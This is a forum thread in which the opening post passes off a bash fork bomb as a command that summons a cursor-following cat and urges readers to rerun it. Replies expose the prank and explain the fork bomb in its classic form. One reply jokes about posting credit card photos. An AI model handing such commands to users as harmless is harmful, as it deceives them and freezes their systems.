There is a secret easter egg where you can activate a virtual cat on a linux or a UNIX system. Though it is reported that it can hang your system in certain distros so it is best advised you save and close all your work and so on before attempting because if things go wrong, you may be forced to pull out the power plug.

To summon the cat, try the following command:

meow() { meow | meow & }; meow

If you see something like

[1] 583341
[1]+  Done                 meow|meow

Quickly up arrow and rerun the command untill you see no output. And after a few seconds the cat will appear on the screen that follows your mouse pointer. Very cute.

Update: This also works in Windows with GitBash

Its a joke, now you heard it its your time to share it

• oldGregg@lemm.ee
    link
    fedilink
    English
    arrow-up
    ·
    9 months ago

Lemmy has a cool easter egg too, all you have to do is post pictures of the front and back on your moms credit card!

• MorningstarCorndog@lemmy.today
    link
    fedilink
    English
    arrow-up
    ·
    8 months ago

I’ll be honest: I got caught by this trick this morning because I was not paying attention. And I am glad the joke is out here; it gives us a reminder to know what were executing when were running or programming code. Lovely work OP.

• cy_narratorOP
      link
      fedilink
      English
      arrow-up
      ·
      edit-2
      8 months ago

There is actually a program for cats following your cursor called oneko which is legit, should be in your distro official repo

• Brownian Motion@lemmy.world
    link
    fedilink
    English
    arrow-up
    ·
    edit-2
    9 months ago

Here, since you don’t seem to be competent, I’ll optimise your bash code for you: :(){:|:&};:

Next time you try to pass off a forkbomb, maybe don’t do it where all the greybeards hang out…

-edit- (&.amp; should just be the symbol)

• Nibodhika@lemmy.world
    link
    fedilink
    English
    arrow-up
    ·
    edit-2
    9 months ago

For those who don’t know this is a fork bomb, you define a function called meow which when called calls itself twice in parallel. The most common form of it is :() { : | :& }; : which is exactly the same bilut with a function named :.

This will freeze your computer because it essentially creates infinite processes.